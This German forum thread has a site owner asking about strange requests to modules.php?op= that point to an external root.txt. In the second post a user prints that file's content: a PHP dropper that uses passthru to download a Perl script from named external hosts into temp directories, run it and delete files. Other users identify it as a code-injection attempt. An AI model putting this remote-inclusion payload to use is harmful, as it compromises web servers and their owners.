Suche

[handy36]

Hallo
In letzter Zeithabe ich Besucher die im Tracking aufscheinen und folgenden Url aufgerufen haben.
/html//modules.php?op=http://trendpresent.de/images /root.txt?
Hat schon jemand sowas wiederfahren, oder brauch ich mir keine Sorgen machen.
Gruß

[Energy-drink]

hast die URL schon mal aufgerufen??
da kommt folgender Inhalt.

<?
passthru('cd /tmp;wget http://trendpresent.de/sh;perl sh;rm -f *');
passthru('cd /tmp;curl -O http://trendpresent.de/sh;perl sh;rm -f *');
passthru('cd /tmp;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *');
passthru('cd /tmp;lynx -source ttp://trendpresent.de/sh >sh;perl sh;rm -f *');
passthru('cd /tmp;fetch ttp://trendpresent.de/sht >sh;perl sh;rm -f *');
passthru('cd /tmp;GET ttp://trendpresent.de/sh >sh;perl sh;rm -f *');

passthru('cd /dev/shm;wget http://trendpresent.de/sh;perl sh;rm -f *');
passthru('cd /dev/shm;curl -O http://trendpresent.de/sh;perl sh;rm -f *');
passthru('cd /dev/shm;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *');
passthru('cd /dev/shm;lynx -source http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
passthru('cd /dev/shm;fetch http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
passthru('cd /dev/shm;GET http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');

passthru('cd /var/tmp;wget http://trendpresent.de/sh;perl sh;rm -f *');
passthru('cd /var/tmp;curl -O http://trendpresent.de/sh;perl sh;rm -f *');
passthru('cd /var/tmp;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *');
passthru('cd /var/tmp;lynx -source http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
passthru('cd /var/tmp;fetch http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
passthru('cd /var/tmp;GET http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
?>

gehört die Domain trendpresent.de und die home.arcor dir??

[handy36]

Hi
Eben nicht, meine Domäne lautet http://usv-st-ulrich.at
Gruß

[Energy-drink]

ich kann leider mit diesem ganzen passthru etc. auch nicht wirklich was anfangen... aber irgendwas muss der User ja mit den Aufrufen bewirken wollen. Nach Suchmaschine schaut mir der Aufruf nämlich nicht aus.

[handy36]

Ich weiß leider auch nicht was das ist, aber es sind immer gleich mehrere Besucher von dieser Sorte auf meiner Seite
Bin gespannt was das noch wird.
Gruß

[Carlos Brasil]

Hab das

/html/modules.php?op=http://trendpresent.de/images /root.txt?

auf meinem webspace ausprobiert, da kommt nur eine Fehlermeldung

> Sorry, you can't access this file directly, parameter 'name' is required...

Gibt es auf deinem Server diese root.txt?

Schau auch mal hier http://manuals.phpforum.de/php/function.passthru.php

[Energy-drink]

die URL greift ja nicht auf seinen Server sondern auf den Server von trendpresent.de und dort liegt wohl die root.txt da ich wie im Beitrag 2 geschrieben dies ausgabe bekomme.

Was aber der inhalt aus der txt anrichten will oder kann bin ich überfragt. Da kann vielleicht einer der Admins mit ihrem wissen mehr dazu sagen.

[jubilee]

Es soll versucht werden über die modules.php Fremdcode einzuschleusen.
Was genau in den Shellscripten steht, kann man nicht nachvollziehen. Auf jeden
Fall nix freundliches.
Dieserart Aufruf sollte aber beim Pragmamx nicht funktionieren.

[handy36]

Da bin ich aber beruhigt, die Ip Adresse kommt von der Slowakei.
Gruß